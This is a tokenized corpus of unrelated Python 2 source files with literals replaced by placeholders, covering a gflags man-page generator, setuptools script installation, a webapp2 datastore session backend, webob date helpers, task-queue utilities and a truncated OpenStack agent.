<s> """<STR_LIT>""" <EOL> import os <EOL> import re <EOL> import sys <EOL> import stat <EOL> import time <EOL> import gflags <EOL> _VERSION = '<STR_LIT>' <EOL> def _GetDefaultDestDir ( ) : <EOL> home = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> homeman = os . path . join ( home , '<STR_LIT>' , '<STR_LIT>' ) <EOL> if home and os . path . exists ( homeman ) : <EOL> return homeman <EOL> else : <EOL> return os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> FLAGS = gflags . FLAGS <EOL> gflags . DEFINE_string ( '<STR_LIT>' , _GetDefaultDestDir ( ) , <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> gflags . DEFINE_string ( '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> gflags . DEFINE_integer ( '<STR_LIT:v>' , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> _MIN_VALID_USAGE_MSG = <NUM_LIT:9> <EOL> class Logging : <EOL> """<STR_LIT>""" <EOL> def error ( self , msg ) : print >> sys . stderr , "<STR_LIT>" , msg <EOL> def warn ( self , msg ) : print >> sys . stderr , "<STR_LIT>" , msg <EOL> def info ( self , msg ) : print msg <EOL> def debug ( self , msg ) : self . vlog ( <NUM_LIT:1> , msg ) <EOL> def vlog ( self , level , msg ) : <EOL> if FLAGS . v >= level : print msg <EOL> logging = Logging ( ) <EOL> class App : <EOL> def usage ( self , shorthelp = <NUM_LIT:0> ) : <EOL> print >> sys . stderr , __doc__ <EOL> print >> sys . stderr , "<STR_LIT>" <EOL> print >> sys . stderr , str ( FLAGS ) <EOL> def run ( self ) : <EOL> main ( sys . argv ) <EOL> app = App ( ) <EOL> def GetRealPath ( filename ) : <EOL> """<STR_LIT>""" <EOL> if os . path . isabs ( filename ) : <EOL> return filename <EOL> if filename . startswith ( '<STR_LIT>' ) or filename . startswith ( '<STR_LIT>' ) : <EOL> return os . path . abspath ( filename ) <EOL> path = os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> for directory in path . split ( '<STR_LIT::>' ) : <EOL> tryname = os . path . join ( directory , filename ) <EOL> if os . path . exists ( tryname ) : <EOL> if not os . path . 
isabs ( directory ) : <EOL> return os . path . abspath ( tryname ) <EOL> return tryname <EOL> if os . path . exists ( filename ) : <EOL> return os . path . abspath ( filename ) <EOL> return None <EOL> class Flag ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , flag_desc , help ) : <EOL> """<STR_LIT>""" <EOL> self . desc = flag_desc <EOL> self . help = help <EOL> self . default = '<STR_LIT>' <EOL> self . tips = '<STR_LIT>' <EOL> class ProgramInfo ( object ) : <EOL> """<STR_LIT>""" <EOL> module_py_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_py_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_default_py_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_tips_py_re = re . compile ( r'<STR_LIT>' ) <EOL> module_c_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_c_re = re . compile ( r'<STR_LIT>' ) <EOL> module_java_re = re . compile ( r'<STR_LIT>' ) <EOL> flag_java_re = re . compile ( r'<STR_LIT>' ) <EOL> def __init__ ( self , executable ) : <EOL> """<STR_LIT>""" <EOL> self . long_name = executable <EOL> self . name = os . path . basename ( executable ) <EOL> ( self . short_name , self . ext ) = os . path . splitext ( self . name ) <EOL> self . executable = GetRealPath ( executable ) <EOL> self . output = [ ] <EOL> self . desc = [ ] <EOL> self . modules = { } <EOL> self . module_list = [ ] <EOL> self . date = time . localtime ( time . time ( ) ) <EOL> def Run ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . executable : <EOL> logging . error ( '<STR_LIT>' % self . long_name ) <EOL> return <NUM_LIT:0> <EOL> finfo = os . stat ( self . executable ) <EOL> self . date = time . localtime ( finfo [ stat . ST_MTIME ] ) <EOL> logging . info ( '<STR_LIT>' <EOL> % ( self . executable , FLAGS . help_flag ) ) <EOL> ( child_stdin , child_stdout_and_stderr ) = os . popen4 ( <EOL> [ self . executable , FLAGS . help_flag ] ) <EOL> child_stdin . close ( ) <EOL> self . output = child_stdout_and_stderr . readlines ( ) <EOL> child_stdout_and_stderr . close ( ) <EOL> if len ( self . 
output ) < _MIN_VALID_USAGE_MSG : <EOL> logging . error ( '<STR_LIT>' <EOL> % ( self . name , FLAGS . help_flag , <EOL> len ( self . output ) , self . output ) ) <EOL> return <NUM_LIT:0> <EOL> return <NUM_LIT:1> <EOL> def Parse ( self ) : <EOL> """<STR_LIT>""" <EOL> ( start_line , lang ) = self . ParseDesc ( ) <EOL> if start_line < <NUM_LIT:0> : <EOL> return <EOL> if '<STR_LIT>' == lang : <EOL> self . ParsePythonFlags ( start_line ) <EOL> elif '<STR_LIT:c>' == lang : <EOL> self . ParseCFlags ( start_line ) <EOL> elif '<STR_LIT>' == lang : <EOL> self . ParseJavaFlags ( start_line ) <EOL> def ParseDesc ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> exec_mod_start = self . executable + '<STR_LIT::>' <EOL> after_blank = <NUM_LIT:0> <EOL> start_line = <NUM_LIT:0> <EOL> for start_line in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ start_line ] . rstrip ( ) <EOL> if ( '<STR_LIT>' == line <EOL> and len ( self . output ) > start_line + <NUM_LIT:1> <EOL> and '<STR_LIT>' == self . output [ start_line + <NUM_LIT:1> ] . rstrip ( ) ) : <EOL> start_line += <NUM_LIT:2> <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> return ( start_line , '<STR_LIT>' ) <EOL> if exec_mod_start == line : <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> return ( start_line , '<STR_LIT>' ) <EOL> if after_blank and line . startswith ( '<STR_LIT>' ) : <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> return ( start_line , '<STR_LIT:c>' ) <EOL> if line == '<STR_LIT>' : <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> start_line += <NUM_LIT:2> <EOL> return ( start_line , '<STR_LIT>' ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> self . desc . append ( line ) <EOL> after_blank = ( line == '<STR_LIT>' ) <EOL> else : <EOL> logging . warn ( '<STR_LIT>' <EOL> % self . 
long_name ) <EOL> return ( - <NUM_LIT:1> , '<STR_LIT>' ) <EOL> def ParsePythonFlags ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> modname = None <EOL> modlist = [ ] <EOL> flag = None <EOL> for line_num in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ line_num ] . rstrip ( ) <EOL> if not line : <EOL> continue <EOL> mobj = self . module_py_re . match ( line ) <EOL> if mobj : <EOL> modname = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> continue <EOL> mobj = self . flag_py_re . match ( line ) <EOL> if mobj : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> flag = Flag ( mobj . group ( <NUM_LIT:1> ) , mobj . group ( <NUM_LIT:2> ) ) <EOL> continue <EOL> if not flag : <EOL> logging . error ( '<STR_LIT>' % line ) <EOL> mobj = self . flag_default_py_re . match ( line ) <EOL> if mobj : <EOL> flag . default = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> continue <EOL> mobj = self . flag_tips_py_re . match ( line ) <EOL> if mobj : <EOL> flag . tips = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> continue <EOL> if flag and flag . help : <EOL> flag . help += line <EOL> else : <EOL> logging . info ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> def ParseCFlags ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> modname = None <EOL> modlist = [ ] <EOL> flag = None <EOL> for line_num in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ line_num ] . rstrip ( ) <EOL> if not line : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> flag = None <EOL> continue <EOL> mobj = self . module_c_re . 
match ( line ) <EOL> if mobj : <EOL> modname = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> continue <EOL> mobj = self . flag_c_re . match ( line ) <EOL> if mobj : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> flag = Flag ( mobj . group ( <NUM_LIT:1> ) , mobj . group ( <NUM_LIT:2> ) ) <EOL> continue <EOL> if flag : <EOL> flag . help += '<STR_LIT:U+0020>' + line . strip ( ) <EOL> else : <EOL> logging . info ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> def ParseJavaFlags ( self , start_line = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> modname = '<STR_LIT>' <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> for line_num in range ( start_line , len ( self . output ) ) : <EOL> line = self . output [ line_num ] . rstrip ( ) <EOL> logging . vlog ( <NUM_LIT:2> , '<STR_LIT>' % line ) <EOL> if not line : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> flag = None <EOL> continue <EOL> mobj = self . module_java_re . match ( line ) <EOL> if mobj : <EOL> modname = mobj . group ( <NUM_LIT:1> ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> self . module_list . append ( modname ) <EOL> self . modules . setdefault ( modname , [ ] ) <EOL> modlist = self . modules [ modname ] <EOL> flag = None <EOL> continue <EOL> mobj = self . flag_java_re . match ( line ) <EOL> if mobj : <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> logging . debug ( '<STR_LIT>' % line ) <EOL> flag = Flag ( mobj . group ( <NUM_LIT:1> ) , mobj . group ( <NUM_LIT:2> ) ) <EOL> continue <EOL> if flag : <EOL> flag . 
help += '<STR_LIT:U+0020>' + line . strip ( ) <EOL> else : <EOL> logging . info ( '<STR_LIT>' % line ) <EOL> if flag : <EOL> modlist . append ( flag ) <EOL> def Filter ( self ) : <EOL> """<STR_LIT>""" <EOL> if not self . desc : <EOL> self . short_desc = '<STR_LIT>' <EOL> return <EOL> for i in range ( len ( self . desc ) ) : <EOL> if self . desc [ i ] . find ( self . executable ) >= <NUM_LIT:0> : <EOL> self . desc [ i ] = self . desc [ i ] . replace ( self . executable , self . name ) <EOL> self . short_desc = self . desc [ <NUM_LIT:0> ] <EOL> word_list = self . short_desc . split ( '<STR_LIT:U+0020>' ) <EOL> all_names = [ self . name , self . short_name , ] <EOL> while word_list and ( word_list [ <NUM_LIT:0> ] in all_names <EOL> or word_list [ <NUM_LIT:0> ] . lower ( ) in all_names ) : <EOL> del word_list [ <NUM_LIT:0> ] <EOL> self . short_desc = '<STR_LIT>' <EOL> if not self . short_desc and word_list : <EOL> self . short_desc = '<STR_LIT:U+0020>' . join ( word_list ) <EOL> class GenerateDoc ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proginfo , directory = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> self . info = proginfo <EOL> self . dirname = directory <EOL> def Output ( self ) : <EOL> """<STR_LIT>""" <EOL> self . Open ( ) <EOL> self . Header ( ) <EOL> self . Body ( ) <EOL> self . Footer ( ) <EOL> def Open ( self ) : raise NotImplementedError <EOL> def Header ( self ) : raise NotImplementedError <EOL> def Body ( self ) : raise NotImplementedError <EOL> def Footer ( self ) : raise NotImplementedError <EOL> class GenerateMan ( GenerateDoc ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , proginfo , directory = '<STR_LIT:.>' ) : <EOL> """<STR_LIT>""" <EOL> GenerateDoc . __init__ ( self , proginfo , directory ) <EOL> def Open ( self ) : <EOL> if self . dirname == '<STR_LIT:->' : <EOL> logging . info ( '<STR_LIT>' ) <EOL> self . fp = sys . stdout <EOL> else : <EOL> self . file_path = '<STR_LIT>' % os . path . join ( self . dirname , self . 
info . name ) <EOL> logging . info ( '<STR_LIT>' % self . file_path ) <EOL> self . fp = open ( self . file_path , '<STR_LIT:w>' ) <EOL> def Header ( self ) : <EOL> self . fp . write ( <EOL> '<STR_LIT>' <EOL> % _VERSION ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' <EOL> % ( self . info . name , time . strftime ( '<STR_LIT>' , self . info . date ) , self . info . name ) ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' % ( self . info . name , self . info . short_desc ) ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' % self . info . name ) <EOL> def Body ( self ) : <EOL> self . fp . write ( <EOL> '<STR_LIT>' ) <EOL> for ln in self . info . desc : <EOL> self . fp . write ( '<STR_LIT>' % ln ) <EOL> self . fp . write ( <EOL> '<STR_LIT>' ) <EOL> for modname in self . info . module_list : <EOL> if modname . find ( self . info . executable ) >= <NUM_LIT:0> : <EOL> mod = modname . replace ( self . info . executable , self . info . name ) <EOL> else : <EOL> mod = modname <EOL> self . fp . write ( '<STR_LIT>' % mod ) <EOL> for flag in self . info . modules [ modname ] : <EOL> help_string = flag . help <EOL> if flag . default or flag . tips : <EOL> help_string += '<STR_LIT>' <EOL> if flag . default : <EOL> help_string += '<STR_LIT>' % flag . default <EOL> if flag . tips : <EOL> help_string += '<STR_LIT>' % flag . tips <EOL> self . fp . write ( <EOL> '<STR_LIT>' % ( flag . desc , help_string ) ) <EOL> def Footer ( self ) : <EOL> self . fp . write ( <EOL> '<STR_LIT>' <EOL> % time . strftime ( '<STR_LIT>' , self . info . date ) ) <EOL> self . fp . write ( '<STR_LIT>' <EOL> % ( self . info . name , FLAGS . help_flag ) ) <EOL> self . fp . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' % self . info . name ) <EOL> def main ( argv ) : <EOL> argv = FLAGS ( argv ) <EOL> if len ( argv ) <= <NUM_LIT:1> : <EOL> app . usage ( shorthelp = <NUM_LIT:1> ) <EOL> return <NUM_LIT:1> <EOL> for arg in argv [ <NUM_LIT:1> : ] : <EOL> prog = ProgramInfo ( arg ) <EOL> if not prog . 
Run ( ) : <EOL> continue <EOL> prog . Parse ( ) <EOL> prog . Filter ( ) <EOL> doc = GenerateMan ( prog , FLAGS . dest_dir ) <EOL> doc . Output ( ) <EOL> return <NUM_LIT:0> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> from distutils . command . install_scripts import install_scripts as _install_scripts <EOL> from easy_install import get_script_args , sys_executable , chmod <EOL> from pkg_resources import Distribution , PathMetadata , ensure_directory <EOL> import os <EOL> from distutils import log <EOL> class install_scripts ( _install_scripts ) : <EOL> """<STR_LIT>""" <EOL> def initialize_options ( self ) : <EOL> _install_scripts . initialize_options ( self ) <EOL> self . no_ep = False <EOL> def run ( self ) : <EOL> self . run_command ( "<STR_LIT>" ) <EOL> if self . distribution . scripts : <EOL> _install_scripts . run ( self ) <EOL> else : <EOL> self . outfiles = [ ] <EOL> if self . no_ep : <EOL> return <EOL> ei_cmd = self . get_finalized_command ( "<STR_LIT>" ) <EOL> dist = Distribution ( <EOL> ei_cmd . egg_base , PathMetadata ( ei_cmd . egg_base , ei_cmd . egg_info ) , <EOL> ei_cmd . egg_name , ei_cmd . egg_version , <EOL> ) <EOL> bs_cmd = self . get_finalized_command ( '<STR_LIT>' ) <EOL> executable = getattr ( bs_cmd , '<STR_LIT>' , sys_executable ) <EOL> is_wininst = getattr ( <EOL> self . get_finalized_command ( "<STR_LIT>" ) , '<STR_LIT>' , False <EOL> ) <EOL> for args in get_script_args ( dist , executable , is_wininst ) : <EOL> self . write_script ( * args ) <EOL> def write_script ( self , script_name , contents , mode = "<STR_LIT:t>" , * ignored ) : <EOL> """<STR_LIT>""" <EOL> log . info ( "<STR_LIT>" , script_name , self . install_dir ) <EOL> target = os . path . join ( self . install_dir , script_name ) <EOL> self . outfiles . append ( target ) <EOL> if not self . dry_run : <EOL> ensure_directory ( target ) <EOL> f = open ( target , "<STR_LIT:w>" + mode ) <EOL> f . write ( contents ) <EOL> f . close ( ) <EOL> chmod ( target , <NUM_LIT:0> <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import absolute_import <EOL> from google . appengine . api import memcache <EOL> try : <EOL> from ndb import model <EOL> except ImportError : <EOL> from google . appengine . ext . ndb import model <EOL> try : <EOL> from ndb . model import PickleProperty <EOL> except ImportError : <EOL> try : <EOL> from google . appengine . ext . ndb . model import PickleProperty <EOL> except ImportError : <EOL> import pickle <EOL> class PickleProperty ( model . BlobProperty ) : <EOL> """<STR_LIT>""" <EOL> def _validate ( self , value ) : <EOL> return value <EOL> def _db_set_value ( self , v , p , value ) : <EOL> super ( PickleProperty , self ) . _db_set_value ( v , p , <EOL> pickle . dumps ( value ) ) <EOL> def _db_get_value ( self , v , p ) : <EOL> if not v . has_stringvalue ( ) : <EOL> return None <EOL> return pickle . loads ( v . stringvalue ( ) ) <EOL> from webapp2_extras import sessions <EOL> class Session ( model . Model ) : <EOL> """<STR_LIT>""" <EOL> updated = model . DateTimeProperty ( auto_now = True ) <EOL> data = PickleProperty ( ) <EOL> @ classmethod <EOL> def get_by_sid ( cls , sid ) : <EOL> """<STR_LIT>""" <EOL> data = memcache . get ( sid ) <EOL> if not data : <EOL> session = model . Key ( cls , sid ) . get ( ) <EOL> if session : <EOL> data = session . data <EOL> memcache . set ( sid , data ) <EOL> return data <EOL> def _put ( self ) : <EOL> """<STR_LIT>""" <EOL> memcache . set ( self . _key . id ( ) , self . data ) <EOL> super ( Session , self ) . put ( ) <EOL> class DatastoreSessionFactory ( sessions . CustomBackendSessionFactory ) : <EOL> """<STR_LIT>""" <EOL> session_model = Session <EOL> def _get_by_sid ( self , sid ) : <EOL> """<STR_LIT>""" <EOL> if self . _is_valid_sid ( sid ) : <EOL> data = self . session_model . get_by_sid ( sid ) <EOL> if data is not None : <EOL> self . sid = sid <EOL> return sessions . SessionDict ( self , data = data ) <EOL> self . sid = self . _get_new_sid ( ) <EOL> return sessions . 
SessionDict ( self , new = True ) <EOL> def save_session ( self , response ) : <EOL> if self . session is None or not self . session . modified : <EOL> return <EOL> self . session_model ( id = self . sid , data = dict ( self . session ) ) . _put ( ) <EOL> self . session_store . save_secure_cookie ( <EOL> response , self . name , { '<STR_LIT>' : self . sid } , ** self . session_args ) </s>
<s> import calendar <EOL> from datetime import ( <EOL> date , <EOL> datetime , <EOL> timedelta , <EOL> tzinfo , <EOL> ) <EOL> from email . utils import ( <EOL> formatdate , <EOL> mktime_tz , <EOL> parsedate_tz , <EOL> ) <EOL> import time <EOL> from webob . compat import ( <EOL> integer_types , <EOL> long , <EOL> native_ , <EOL> text_type , <EOL> ) <EOL> __all__ = [ <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ] <EOL> _now = datetime . now <EOL> class _UTC ( tzinfo ) : <EOL> def dst ( self , dt ) : <EOL> return timedelta ( <NUM_LIT:0> ) <EOL> def utcoffset ( self , dt ) : <EOL> return timedelta ( <NUM_LIT:0> ) <EOL> def tzname ( self , dt ) : <EOL> return '<STR_LIT>' <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' <EOL> UTC = _UTC ( ) <EOL> def timedelta_to_seconds ( td ) : <EOL> """<STR_LIT>""" <EOL> return td . seconds + ( td . days * <NUM_LIT> * <NUM_LIT> * <NUM_LIT> ) <EOL> day = timedelta ( days = <NUM_LIT:1> ) <EOL> week = timedelta ( weeks = <NUM_LIT:1> ) <EOL> hour = timedelta ( hours = <NUM_LIT:1> ) <EOL> minute = timedelta ( minutes = <NUM_LIT:1> ) <EOL> second = timedelta ( seconds = <NUM_LIT:1> ) <EOL> month = timedelta ( days = <NUM_LIT:30> ) <EOL> year = timedelta ( days = <NUM_LIT> ) <EOL> def parse_date ( value ) : <EOL> if not value : <EOL> return None <EOL> try : <EOL> value = native_ ( value ) <EOL> except : <EOL> return None <EOL> t = parsedate_tz ( value ) <EOL> if t is None : <EOL> return None <EOL> if t [ - <NUM_LIT:1> ] is None : <EOL> t = t [ : <NUM_LIT:9> ] + ( <NUM_LIT:0> , ) <EOL> t = mktime_tz ( t ) <EOL> return datetime . 
fromtimestamp ( t , UTC ) <EOL> def serialize_date ( dt ) : <EOL> if isinstance ( dt , ( bytes , text_type ) ) : <EOL> return native_ ( dt ) <EOL> if isinstance ( dt , timedelta ) : <EOL> dt = _now ( ) + dt <EOL> if isinstance ( dt , ( datetime , date ) ) : <EOL> dt = dt . timetuple ( ) <EOL> if isinstance ( dt , ( tuple , time . struct_time ) ) : <EOL> dt = calendar . timegm ( dt ) <EOL> if not ( isinstance ( dt , float ) or isinstance ( dt , integer_types ) ) : <EOL> raise ValueError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % dt ) <EOL> return formatdate ( dt , usegmt = True ) <EOL> def parse_date_delta ( value ) : <EOL> """<STR_LIT>""" <EOL> if not value : <EOL> return None <EOL> try : <EOL> value = int ( value ) <EOL> except ValueError : <EOL> return parse_date ( value ) <EOL> else : <EOL> return _now ( ) + timedelta ( seconds = value ) <EOL> def serialize_date_delta ( value ) : <EOL> if isinstance ( value , ( float , int , long ) ) : <EOL> return str ( int ( value ) ) <EOL> else : <EOL> return serialize_date ( value ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' ] <EOL> try : <EOL> from UserDict import DictMixin <EOL> except ImportError : <EOL> class DictMixin : <EOL> def __iter__ ( self ) : <EOL> for k in self . keys ( ) : <EOL> yield k <EOL> def has_key ( self , key ) : <EOL> try : <EOL> value = self [ key ] <EOL> except KeyError : <EOL> return False <EOL> return True <EOL> def __contains__ ( self , key ) : <EOL> return self . has_key ( key ) <EOL> def iteritems ( self ) : <EOL> for k in self : <EOL> yield ( k , self [ k ] ) <EOL> def iterkeys ( self ) : <EOL> return self . __iter__ ( ) <EOL> def itervalues ( self ) : <EOL> for _ , v in self . iteritems ( ) : <EOL> yield v <EOL> def values ( self ) : <EOL> return [ v for _ , v in self . iteritems ( ) ] <EOL> def items ( self ) : <EOL> return list ( self . iteritems ( ) ) <EOL> def clear ( self ) : <EOL> for key in self . keys ( ) : <EOL> del self [ key ] <EOL> def setdefault ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> self [ key ] = default <EOL> return default <EOL> def pop ( self , key , * args ) : <EOL> if len ( args ) > <NUM_LIT:1> : <EOL> raise TypeError , "<STR_LIT>" + repr ( <NUM_LIT:1> + len ( args ) ) <EOL> try : <EOL> value = self [ key ] <EOL> except KeyError : <EOL> if args : <EOL> return args [ <NUM_LIT:0> ] <EOL> raise <EOL> del self [ key ] <EOL> return value <EOL> def popitem ( self ) : <EOL> try : <EOL> k , v = self . iteritems ( ) . next ( ) <EOL> except StopIteration : <EOL> raise KeyError , '<STR_LIT>' <EOL> del self [ k ] <EOL> return ( k , v ) <EOL> def update ( self , other = None , ** kwargs ) : <EOL> if other is None : <EOL> pass <EOL> elif hasattr ( other , '<STR_LIT>' ) : <EOL> for k , v in other . iteritems ( ) : <EOL> self [ k ] = v <EOL> elif hasattr ( other , '<STR_LIT>' ) : <EOL> for k in other . keys ( ) : <EOL> self [ k ] = other [ k ] <EOL> else : <EOL> for k , v in other : <EOL> self [ k ] = v <EOL> if kwargs : <EOL> self . 
update ( kwargs ) <EOL> def get ( self , key , default = None ) : <EOL> try : <EOL> return self [ key ] <EOL> except KeyError : <EOL> return default <EOL> def __repr__ ( self ) : <EOL> return repr ( dict ( self . iteritems ( ) ) ) <EOL> def __cmp__ ( self , other ) : <EOL> if other is None : <EOL> return <NUM_LIT:1> <EOL> if isinstance ( other , DictMixin ) : <EOL> other = dict ( other . iteritems ( ) ) <EOL> return cmp ( dict ( self . iteritems ( ) ) , other ) <EOL> def __len__ ( self ) : <EOL> return len ( self . keys ( ) ) </s>
<s> """<STR_LIT>""" <EOL> import datetime <EOL> import os <EOL> import string <EOL> import sys <EOL> import random <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> from google . appengine . api . taskqueue import taskqueue_service_pb <EOL> MAX_ETA = datetime . timedelta ( days = <NUM_LIT:30> ) <EOL> MAX_PULL_TASK_SIZE_BYTES = <NUM_LIT:2> ** <NUM_LIT:20> <EOL> MAX_PUSH_TASK_SIZE_BYTES = <NUM_LIT:100> * ( <NUM_LIT:2> ** <NUM_LIT:10> ) <EOL> RAND_LENGTH_SIZE = <NUM_LIT:32> <EOL> class TASK_STATES : <EOL> QUEUED = "<STR_LIT>" <EOL> SUCCESS = "<STR_LIT:success>" <EOL> FAILED = "<STR_LIT>" <EOL> EXPIRED = "<STR_LIT>" <EOL> def _sec_to_usec ( t_sec ) : <EOL> """<STR_LIT>""" <EOL> return int ( t_sec * <NUM_LIT> ) <EOL> def _usec_to_sec ( t_sec ) : <EOL> """<STR_LIT>""" <EOL> return t_sec / <NUM_LIT> <EOL> def verify_task_queue_add_request ( app_id , request , now ) : <EOL> """<STR_LIT>""" <EOL> if request . eta_usec ( ) < <NUM_LIT:0> : <EOL> return taskqueue_service_pb . TaskQueueServiceError . INVALID_ETA <EOL> eta = datetime . datetime . utcfromtimestamp ( _usec_to_sec ( request . eta_usec ( ) ) ) <EOL> max_eta = now + MAX_ETA <EOL> if eta > max_eta : <EOL> return taskqueue_service_pb . TaskQueueServiceError . INVALID_ETA <EOL> if request . has_crontimetable ( ) and app_id is None : <EOL> return taskqueue_service_pb . TaskQueueServiceError . PERMISSION_DENIED <EOL> if request . mode ( ) == taskqueue_service_pb . TaskQueueMode . PULL : <EOL> max_task_size_bytes = MAX_PULL_TASK_SIZE_BYTES <EOL> else : <EOL> max_task_size_bytes = MAX_PUSH_TASK_SIZE_BYTES <EOL> if request . ByteSize ( ) > max_task_size_bytes : <EOL> return taskqueue_service_pb . TaskQueueServiceError . TASK_TOO_LARGE <EOL> return taskqueue_service_pb . TaskQueueServiceError . SKIPPED <EOL> def _get_random_string ( ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( random . choice ( string . ascii_uppercase + string . 
digits ) for x in range ( RAND_LENGTH_SIZE ) ) <EOL> def choose_task_name ( app_name , queue_name , user_chosen = None ) : <EOL> """<STR_LIT>""" <EOL> if not user_chosen : <EOL> user_chosen = _get_random_string ( ) <EOL> return '<STR_LIT>' % ( app_name , queue_name , user_chosen ) </s>
<s> """<STR_LIT>""" <EOL> from agents . ec2_agent import EC2Agent <EOL> from boto . exception import EC2ResponseError <EOL> import boto <EOL> import os <EOL> from urlparse import urlparse <EOL> from utils import utils <EOL> __author__ = '<STR_LIT>' <EOL> __email__ = '<STR_LIT>' <EOL> class OpenStackAgent ( EC2Agent ) : <EOL> """<STR_LIT>""" <EOL> DEFAULT_REGION = "<STR_LIT>" <EOL> def configure_instance_security ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> keyname = parameters [ self . PARAM_KEYNAME ] <EOL> group = parameters [ self . PARAM_GROUP ] <EOL> key_path = '<STR_LIT>' . format ( utils . KEY_DIRECTORY , keyname ) <EOL> ssh_key = os . path . abspath ( key_path ) <EOL> utils . log ( '<STR_LIT>' '<STR_LIT>' . format ( ssh_key ) ) <EOL> if os . path . exists ( ssh_key ) : <EOL> utils . log ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> return False <EOL> try : <EOL> conn = self . open_connection ( parameters ) <EOL> key_pair = conn . get_key_pair ( keyname ) <EOL> if key_pair is None : <EOL> utils . log ( '<STR_LIT>' . format ( keyname ) ) <EOL> key_pair = conn . create_key_pair ( keyname ) <EOL> utils . write_key_file ( ssh_key , key_pair . material ) <EOL> security_groups = conn . get_all_security_groups ( ) <EOL> group_exists = False <EOL> for security_group in security_groups : <EOL> if security_group . name == group : <EOL> group_exists = True <EOL> break <EOL> if not group_exists : <EOL> utils . log ( '<STR_LIT>' . format ( group ) ) <EOL> conn . create_security_group ( group , '<STR_LIT>' ) <EOL> conn . authorize_security_group ( group , from_port = <NUM_LIT:1> , to_port = <NUM_LIT> , ip_protocol = '<STR_LIT>' ) <EOL> conn . authorize_security_group ( group , from_port = <NUM_LIT:1> , to_port = <NUM_LIT> , ip_protocol = '<STR_LIT>' ) <EOL> conn . 
